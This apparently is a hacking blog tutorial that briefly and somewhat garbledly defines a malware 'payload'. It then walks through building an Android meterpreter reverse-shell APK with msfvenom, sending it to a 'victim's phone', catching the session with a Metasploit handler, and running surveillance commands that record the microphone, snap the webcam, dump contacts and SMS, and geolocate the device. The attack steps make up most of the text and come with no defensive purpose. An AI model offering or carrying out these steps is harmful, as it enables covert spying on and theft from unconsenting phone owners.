What is Payload & How to Hack Android/Windows with it..!

Definition - What is Payload?

      Payload is a component of a computer virus that performs malicious activity. In addition to the infection rate of the virus, the threat level of the virus is caused by the damage caused by that virus. Viruses with more powerful payload are often more harmful. Not all viruses carry the payload, but an example of a payload that is considered a very dangerous payload is a data destructive and disgusting message and delivery of spam by an infected user's account. Payload is also called destructive payload.

My Explanation

       Other viruses may steal data or files, allow eavesdropping or unauthorized access, destroy data, or cause other consequences. The virus may also carry multiple payloads.

Malware is now almost free of payloads that corrupt system files and the backdoor accesses the user's computer to steal confidential information.

There are the following methods for executing the payload:

1. Unprotected computer connected to the network (Proper Antivirus not installed)

2. Use infected removable media to guide your computer

3. Open infected file

Through implementing infected programs

4.By activating logic bombs

How to Hack with it?

1. Start kali and open the command terminal.

2. Set the payload and create an executable custom window

Command:

         root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(To know your LHOST, open a new terminal and enter ifconfig)

Note: Don't add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).

3. Transfer the file (andro.apk) to this file or send it to the victim's phone for installation.

4. Start the metasploit framework console as follows :
      
Command:

      root@kali:-# msfconsole

5. It is time to open and set the multiprocessing program. Follow the steps below:

msf  > use multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.110

msf exploit(handler) > set LPORT 4444

msf exploit(handler) > exploit

6. If the victim clicks on the application of his phone (installed as the MAIN ACTIVITY of the menu), a tampering session will be established.

7. Try the following exploit commands :
    - record_mic
    - webcam_snap
    - webcam_stream
    - dump_contacts
    - dump_sms
    - geolocate

If you guys need any help regarding to this article. You could comment down below :)